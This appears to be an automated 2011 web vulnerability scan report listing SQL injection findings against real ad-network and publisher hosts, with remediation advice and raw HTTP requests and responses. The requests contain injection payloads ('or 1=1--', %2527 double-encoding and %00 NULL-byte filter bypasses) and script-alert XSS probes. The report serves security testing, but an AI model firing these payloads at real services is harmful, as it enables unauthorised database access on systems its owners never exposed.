
25.58. http://tracker.u-link.me/ut_.js

25.59. http://video.od.visiblemeasures.com/log

25.60. http://widget.newsinc.com/ndn_toppicks.html

25.61. http://www.delish.com/api_static/twitter.json

25.62. http://www.donatemydress.org/

25.63. http://www.metrix4media.com/

25.64. http://www.metrix4media.com/solutions.html

25.65. http://www.misquincemag.com/misquincepp-quinceanera-2009-mis-quince-insert

25.66. http://www.networkadvertising.org/managing/opt_out.asp

25.67. http://www.networkadvertising.org/managing/optout_results.asp

25.68. http://www.quickandsimple.com/pp-qas-2011-9-7

25.69. http://www.realage.com/glossary.json

25.70. http://www.realage.com/promo-player-homepage-2011-03-25

25.71. http://www.seventeen.com/api_static/twitter.json

25.72. http://www.thedailygreen.com/api_static/twitter.json

25.73. http://www.thedailygreen.com/homezipfeed/

25.74. http://www.thedailygreen.com/promo-homepage-110916

25.75. http://www.tribalfusion.com/test/opt.js

25.76. http://www.ugo.com/takeover/takeover.html

25.77. http://www.ugo.com/xd_receiver.htm

26. Content type incorrectly stated

26.1. http://a.rad.msn.com/ADSAdClient31.dll

26.2. http://a1.interclick.com/getInPageJS.aspx

26.3. http://a1.interclick.com/getInPageJSProcess.aspx

26.4. http://ad.doubleclick.net/pfadx/seventeen_cim/

26.5. http://adserver.teracent.net/tase/ad

26.6. http://amch.questionmarket.com/adscgen/d_layer.php

26.7. http://amch.questionmarket.com/adscgen/dynamiclink.js.php

26.8. http://amch.questionmarket.com/adscgen/st.php

26.9. http://api.uproxx.com/ulink/feed

26.10. http://api.uproxx.com/ulink/template.js

26.11. http://api.zap2it.com/tvlistings/zcConnector.jsp

26.12. http://b.rad.msn.com/ADSAdClient31.dll

26.13. http://bs.serving-sys.com/BurstingPipe/adServer.bs

26.14. http://content.pulse360.com/535BB4CE-7CD8-11E0-8B1F-79D9E4064C68

26.15. http://ellegirl.elle.com/wp-content/themes/thesis/custom/images/hearst-logo.png

26.16. http://event.adxpose.com/event.flow

26.17. http://events.seattlepi.com/partner_json/search

26.18. http://events.stamfordadvocate.com/partner_json/search

26.19. http://flesler-plugins.googlecode.com/files/jquery.localscroll-1.2.7-min.js

26.20. http://goku.brightcove.com/1pix.gif

26.21. http://hearst.com/flash/slideshow-home.xml

26.22. http://hearst.com/flash/slideshow-newspapers.xml

26.23. http://hfm.checkm8.com/adam/detect

26.24. http://html5form.googlecode.com/svn/trunk/jquery.html5form-min.js

26.25. http://o.aolcdn.com/os_merge/

26.26. http://ps2.newsinc.com/Playlist/show/90009/1709/507.xml

26.27. http://ps2.newsinc.com/players/GetZoneID/90009.xml

26.28. http://r.skimresources.com/api/

26.29. http://rad.msn.com/ADSAdClient31.dll

26.30. http://seattlepi.ux.hearstdigitalnews.com/favicon.ico

26.31. http://sensor2.suitesmart.com/sensor4.js

26.32. http://stamfordadvocate.ux.hearstdigitalnews.com/favicon.ico

26.33. http://thumbnail.newsinc.com/23529630.sf.jpg

26.34. http://tracker.u-link.me/ut_.js

26.35. http://ua.uproxxcdn.com/CXBetoHkoRG7G0E.png

26.36. http://ua.uproxxcdn.com/DZ2iEV7OFqoJUqT.png

26.37. http://ua.uproxxcdn.com/FKOcJyHi3WPtNW3.png

26.38. http://ua.uproxxcdn.com/RagyhhqntMN7eO5.png

26.39. http://ua.uproxxcdn.com/WiYUAs3s08PJENf.png

26.40. http://ua.uproxxcdn.com/r63wMetmtJgpwY8.jpg

26.41. http://video.od.visiblemeasures.com/log

26.42. http://vms.msn.com/vms.aspx

26.43. http://www.delish.com/api_static/twitter.json

26.44. http://www.delish.com/delish-network-tout.json

26.45. http://www.delish.com/promo-player-homepage-2011-9-15

26.46. http://www.facebook.com/extern/login_status.php

26.47. http://www.kampyle.com/favicon.ico

26.48. http://www.local.com/skins/default/images/locm_transhadow_v001.jpg

26.49. http://www.meebo.com/mcmd/events

26.50. http://www.meebo.com/mcmd/subscribe

26.51. http://www.misquincemag.com/misquincepp-quinceanera-2009-mis-quince-insert

26.52. http://www.quickandsimple.com/pp-qas-2011-9-7

26.53. http://www.realage.com/glossary.json

26.54. http://www.realage.com/promo-player-homepage-2011-03-25

26.55. http://www.seattlepi.com/mediaManager/

26.56. http://www.seventeen.com/api_static/twitter.json

26.57. http://www.stamfordadvocatedailydeals.com/favicon.ico

26.58. http://www.stamfordadvocatedailydeals.com/widgets/a

26.59. http://www.thedailygreen.com/api_static/twitter.json

26.60. http://www.thedailygreen.com/promo-homepage-110916

26.61. http://www.tribalfusion.com/test/opt.js

27. Content type is not specified

27.1. http://208.111.153.35/open/1

27.2. http://ad.technoratimedia.com/st

27.3. http://pcm1.map.pulsemgr.com/uds/pc

27.4. http://www.meebo.com/cmd/btproviders

27.5. http://www.meebo.com/cmd/tc

27.6. http://www.meebo.com/mcmd/start


1. SQL injection  next
There are 40 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

1.1. http://ad.doubleclick.net/adj/DY146/ron_lifestyle [sz parameter]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adj/DY146/ron_lifestyle

Issue detail

The sz parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the sz parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the sz request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /adj/DY146/ron_lifestyle;sz=300x250;ord=2310888?%2527 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.misquincemag.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 3564
Set-Cookie: id=c2102423c000027||t=1316277512|et=730|cs=002213fd48cb8966602b2a269f; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 16:38:32 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 16:38:32 GMT
Date: Sat, 17 Sep 2011 16:38:31 GMT
Expires: Sat, 17 Sep 2011 16:38:31 GMT
Cache-Control: private

document.write('<IFRAME SRC=\"http://ad.doubleclick.net/adi/N5019.284127.DBGVIDEONETWORK/B5621714;sz=1x1;pc=[TPAS_ID];click=;ord=4397376?\" WIDTH=1 HEIGHT=1 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPAC
...[SNIP]...
033469%3B4307-300/250%3B42867329/42885116/1%3B%3B%7Esscs%3D%3fhttp://www.eyewonderlabs.com/ct2.cfm?ewbust=0&guid=0&ewadid=147002&eid=1465331&file=http://cdn.eyewonder.com/100125/769319/1465331/NOSCRIPTfailover.jpg&pnl=MainBanner&type=0&name=Clickthru-NOSCRIPT&num=1&time=0&diff=0&clkX=&clkY=&click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/3/0/%2a/w%3B246333486%3B0-0%3B0%3B46033469%3B4307-300/250%3B42
...[SNIP]...

Request 2

GET /adj/DY146/ron_lifestyle;sz=300x250;ord=2310888?%2527%2527 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.misquincemag.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 1712
Set-Cookie: id=cd801423c0000f8||t=1316277513|et=730|cs=002213fd485921263baaebd341; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 16:38:33 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 16:38:33 GMT
Date: Sat, 17 Sep 2011 16:38:33 GMT
Expires: Sat, 17 Sep 2011 16:38:33 GMT
Cache-Control: private

document.write('<IFRAME SRC=\"http://ad.doubleclick.net/adi/N5019.284127.DBGVIDEONETWORK/B5621714.2;sz=300x250;pc=[TPAS_ID];click0=http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/3/0/%2a/p%3B246333480%3
...[SNIP]...
1.2. http://ad.doubleclick.net/adj/hdm.quicksimple/other/ [id cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adj/hdm.quicksimple/other/

Issue detail

The id cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the id cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /adj/hdm.quicksimple/other/;sz=728x90,1000x124;tile=1;pos=1;site=quicksimple;sect=index;sub=index;subsub=index;page=homepage;cat=other;subcat=;tool=ros;artid=;kw=;a=;b=;mtfIFPath=/cm/shared/admeld/;game=;ord=2083708371501416? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.quickandsimple.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT%00'

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7122
Set-Cookie: id=c6bf8413c00006d||t=1316277322|et=730|cs=002213fd4847ac9fe262429b03; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 16:35:22 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 16:35:22 GMT
Date: Sat, 17 Sep 2011 16:35:22 GMT
Expires: Sat, 17 Sep 2011 16:35:22 GMT
Cache-Control: private

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Sep 01 13:12:40 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
h"];if(x && x.description){var pVF=x.description;var y=pVF.indexOf("Flash ")+6;pVM=pVF.substring(y,pVF.indexOf(".",y));}}
else if (window.ActiveXObject && window.execScript){
window.execScript('on error resume next\npVM=2\ndo\npVM=pVM+1\nset swControl = CreateObject("ShockwaveFlash.ShockwaveFlash."&pVM)\nloop while Err = 0\nOn Error Resume Next\npVM=pVM-1\nSub '+DCid+'_FSCommand(ByVal command, ByVal
...[SNIP]...

Request 2

GET /adj/hdm.quicksimple/other/;sz=728x90,1000x124;tile=1;pos=1;site=quicksimple;sect=index;sub=index;subsub=index;page=homepage;cat=other;subcat=;tool=ros;artid=;kw=;a=;b=;mtfIFPath=/cm/shared/admeld/;game=;ord=2083708371501416? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.quickandsimple.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT%00''

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 278
Set-Cookie: id=c7bf8413c0000a6||t=1316277323|et=730|cs=002213fd4830959e95967a6e6c; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 16:35:23 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 16:35:23 GMT
Date: Sat, 17 Sep 2011 16:35:23 GMT
Expires: Sat, 17 Sep 2011 16:35:23 GMT
Cache-Control: private

document.write('');

admeld_publisher = 303;
admeld_site = 'hearst_us';
admeld_size = '728x90';
admeld_placement = 'quickandsimple_us';

document.write('\n<script type=\"text/javascript
...[SNIP]...
1.3. http://api.uproxx.com/ulink/feed [c_cats parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://api.uproxx.com
Path:   /ulink/feed

Issue detail

The c_cats parameter appears to be vulnerable to SQL injection attacks. The payloads 16216981'%20or%201%3d1--%20 and 16216981'%20or%201%3d2--%20 were each submitted in the c_cats parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /ulink/feed?pid=163&limit=12&c_cats=3,15,17,16216981'%20or%201%3d1--%20&uw_nsfw=false&format=json HTTP/1.1
Host: api.uproxx.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=e21911b30cf3ed12536b7b3e176e20ab

Response 1

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:34:49 GMT
Server: Apache
Connection: close
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 4563

UPROXXJSON(
[{"category":"Web Culture","content_title":"UPROXX Interview With Charlie Day","image_url":"http:\/\/ua.uproxxcdn.com\/6PxEor9uKEjF6Lm.jpg","content_clicks":"10999","source_title":"Uproxx"
...[SNIP]...
e_favicon":"http:\/\/www.google.com\/s2\/favicons?domain=www.camelclutchblog.com","content_link":"http:\/\/widget.uproxx.com\/t\/1u106377o163"},{"category":"Geek\/Sci-Fi\/Gaming News","content_title":"Black Ops Freak Out!","image_url":"http:\/\/ua.uproxxcdn.com\/5i4Q0VYMyo7fr8O.jpg","content_clicks":"3195","source_title":"Chru Dat","source_url":"http:\/\/www.chrudat.com","source_favicon":"http:\/\/www.google.com\/s2\/favicons?domain=www.chrudat.com","content_link":"http:\/\/widget.uproxx.com\/t\/1u106685o163"},{"category":"Geek\/Sci-Fi\/Gaming News","content_title":"Anime Expo 2011 Video Game Cosplay","image_url":"http:\/\/ua.uproxxcdn.com\/WYgN5RE569G2Jjs.png","content_clicks":"29353","source_title":"G4TV","source_url":"http:\/\/g4tv.com\/","source_favicon":"http:\/\/www.google.com\/s2\/favicons?domain=g4tv.com","content_link":"http:\/\/widget.uproxx.com\/t\/1a101711o163"},{"category":"Web Culture","content_title":"The 15 Best Singing Performances In Non-musical Fi","image_url":"http:\/\/ua.uproxxcdn.com\/idlhYruu5wciG76.jpg","content_clicks":"11","source_title":"BuzzFeed","source_url":"http:\/\/www.buzzfeed.com","source_favicon":"http:\/\/www.google.com\/s2\/favicons?domain=www.buzzfeed.com","content_link":"http:\/\/widget.uproxx.com\/t\/1r107997o163"},{"category":"Geek\/Sci-Fi\/Gaming News","content_title":"Internet Browsers As Pretty Ladies","image_url":"http:\/\/ua.uproxxcdn.com\/XNo3uSJmW62dTv1.jpg","content_clicks":"190","source_title":"NextRound","source_url":"http:\/\/nextround.net","source_favicon":"http:\/\/www.google.com\/s2\/favicons?domain=nextround.net","content_link":"http:\/\/widget.uproxx.com\/t\/1r107802o163"},{"category":"Geek\/Sci-Fi\/Gaming News","content_title":"Oh, Tom Brady: Your Pretty Mouth Was Never Meant F","image_url":"http:\/\/ua.uproxxcdn.com\/XLGjl6SZe8fykLv.jpg","content_clicks":"45","source_title":"Pajiba","source_url":"http:\/\/www.pajiba.com","source_favicon":"http:\/\/www.google.com\/s2\/favicons?domain=www.pajiba.com","content_link":"http:\/\/widget.uproxx.com\/t\/1r107973o163"},{"category":"Web Culture","content_title":"The 50 Most Entertaining Sh**ty Movies","image_url":"http:\/\/ua.uproxxcdn.com\/CXBetoHkoRG7G0E.png","con
...[SNIP]...

Request 2

GET /ulink/feed?pid=163&limit=12&c_cats=3,15,17,16216981'%20or%201%3d2--%20&uw_nsfw=false&format=json HTTP/1.1
Host: api.uproxx.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=e21911b30cf3ed12536b7b3e176e20ab

Response 2

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:34:49 GMT
Server: Apache
Connection: close
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 4548

UPROXXJSON(
[{"category":"Web Culture","content_title":"UPROXX Interview With Charlie Day","image_url":"http:\/\/ua.uproxxcdn.com\/6PxEor9uKEjF6Lm.jpg","content_clicks":"10999","source_title":"Uproxx"
...[SNIP]...
e_favicon":"http:\/\/www.google.com\/s2\/favicons?domain=www.camelclutchblog.com","content_link":"http:\/\/widget.uproxx.com\/t\/1u106377o163"},{"category":"Geek\/Sci-Fi\/Gaming News","content_title":"Pokeball Bras Are A Thing","image_url":"http:\/\/ua.uproxxcdn.com\/4ppTtVOloDM8xzC.jpg","content_clicks":"98100","source_title":"Chru Dat","source_url":"http:\/\/www.chrudat.com","source_favicon":"http:\/\/www.google.com\/s2\/favicons?domain=www.chrudat.com","content_link":"http:\/\/widget.uproxx.com\/t\/1u101223o163"},{"category":"Geek\/Sci-Fi\/Gaming News","content_title":"Awesome Attack of the Show Wonder Woman Cosplay","image_url":"http:\/\/ua.uproxxcdn.com\/XVkDdOxfJroEaBO.png","content_clicks":"7441","source_title":"G4TV","source_url":"http:\/\/g4tv.com\/","source_favicon":"http:\/\/www.google.com\/s2\/favicons?domain=g4tv.com","content_link":"http:\/\/widget.uproxx.com\/t\/1u103599o163"},{"category":"Web Culture","content_title":"25 Inane Zooeyisms","image_url":"http:\/\/ua.uproxxcdn.com\/r63wMetmtJgpwY8.jpg","content_clicks":"2397","source_title":"BuzzFeed","source_url":"http:\/\/www.buzzfeed.com","source_favicon":"http:\/\/www.google.com\/s2\/favicons?domain=www.buzzfeed.com","content_link":"http:\/\/widget.uproxx.com\/t\/1a106792o163"},{"category":"Web Culture","content_title":"Photoshop: You Know What to Do","image_url":"http:\/\/ua.uproxxcdn.com\/n1gKAfQZb9Flva6.png","content_clicks":"20690","source_title":"NextRound","source_url":"http:\/\/nextround.net","source_favicon":"http:\/\/www.google.com\/s2\/favicons?domain=nextround.net","content_link":"http:\/\/widget.uproxx.com\/t\/1u105974o163"},{"category":"Geek\/Sci-Fi\/Gaming News","content_title":"Let's Pour Some Out For The Stars Who Never Were","image_url":"http:\/\/ua.uproxxcdn.com\/3Ob3olsyCseRJwE.jpg","content_clicks":"3231","source_title":"Pajiba","source_url":"http:\/\/www.pajiba.com","source_favicon":"http:\/\/www.google.com\/s2\/favicons?domain=www.pajiba.com","content_link":"http:\/\/widget.uproxx.com\/t\/1r104591o163"},{"category":"Geek\/Sci-Fi\/Gaming News","content_title":"Marisa Miller Gets R.I.P.D.","image_url":"http:\/\/ua.uproxxcdn.com\/kkkLAbmhiJFVLSE.png","content_clicks":"12363","sou
...[SNIP]...
1.4. http://hfm.checkm8.com/adam/detect [&LOC parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://hfm.checkm8.com
Path:   /adam/detect

Issue detail

The &LOC parameter appears to be vulnerable to SQL injection attacks. The payloads 18653300'%20or%201%3d1--%20 and 18653300'%20or%201%3d2--%20 were each submitted in the &LOC parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adam/detect?cat=hfmus.eg.hp.landingpage&page=35152207082137465&serial=1000:1:A&&LOC=http://ellegirl.elle.com/\qb1903\p3C/script\p3E\p3Cscript\p3Ealert(document.location)\p3C/script\p3E43727dda065=118653300'%20or%201%3d1--%20&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=16&RES=RS21&ORD=759729630779475&req=fr&& HTTP/1.1
Host: hfm.checkm8.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110917162454,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1316276692; A=dqR5Y9wlTKRLv9UJ7MTba; C=oqR5Y9wCJH5ScaabaSI0P3Xb

Response 1

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:50:38 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.13 NY-AD3
Set-cookie: A=dqR5Y9wSL3KUv9UJ7MTba;Path=/;
Set-cookie: C=okL6Y9wbG5Y1caaJaSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:23:58 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 156333621/1230474426/2850622218/2591229859
x-internal-selected:
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

Request 2

GET /adam/detect?cat=hfmus.eg.hp.landingpage&page=35152207082137465&serial=1000:1:A&&LOC=http://ellegirl.elle.com/\qb1903\p3C/script\p3E\p3Cscript\p3Ealert(document.location)\p3C/script\p3E43727dda065=118653300'%20or%201%3d2--%20&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=16&RES=RS21&ORD=759729630779475&req=fr&& HTTP/1.1
Host: hfm.checkm8.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110917162454,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1316276692; A=dqR5Y9wlTKRLv9UJ7MTba; C=oqR5Y9wCJH5ScaabaSI0P3Xb

Response 2

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:50:38 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.13 NY-AD3
Set-cookie: C=okL6Y9wbG5Y1caaKaSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:23:58 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 156333621/1230474426/2850622218/2591229859
x-internal-selected:
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...
1.5. http://hfm.checkm8.com/adam/detect [HEIGHT parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://hfm.checkm8.com
Path:   /adam/detect

Issue detail

The HEIGHT parameter appears to be vulnerable to SQL injection attacks. The payloads 21414440%20or%201%3d1--%20 and 21414440%20or%201%3d2--%20 were each submitted in the HEIGHT parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adam/detect?cat=hfmus.eg.hp.landingpage&page=35152207082137465&serial=1000:1:A&&LOC=http://ellegirl.elle.com/\qb1903\p3C/script\p3E\p3Cscript\p3Ealert(document.location)\p3C/script\p3E43727dda065=1&WIDTH=1087&HEIGHT=87021414440%20or%201%3d1--%20&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=16&RES=RS21&ORD=759729630779475&req=fr&& HTTP/1.1
Host: hfm.checkm8.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110917162454,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1316276692; A=dqR5Y9wlTKRLv9UJ7MTba; C=oqR5Y9wCJH5ScaabaSI0P3Xb

Response 1

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:50:45 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.12 NY-AD2
Set-cookie: A=dqR5Y9wCJ38Sv9UJ7MTba;Path=/;
Set-cookie: C=orL6Y9wx3NQ0caabbSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:24:04 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
